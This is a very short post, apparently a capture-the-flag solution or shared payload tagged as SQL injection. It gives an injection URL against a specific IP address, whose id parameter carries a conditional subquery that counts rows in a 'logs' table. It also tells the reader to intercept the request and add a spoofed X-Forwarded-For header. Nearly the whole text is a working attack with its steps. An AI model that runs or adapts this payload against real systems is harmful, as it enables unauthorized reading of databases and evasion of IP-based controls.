Tags: injection sql
Rating: 3.3
http://139.59.239.133/?id=if((select sum(case when(ip='0.0.0.2') then 1 else 0 end) from logs) = 1, 1, 2) #
Simultaneously, use Tamper Data or something like that to intercept the datagram and add `X-Forwarded-For: 0.0.0.2` and then submit it.
: )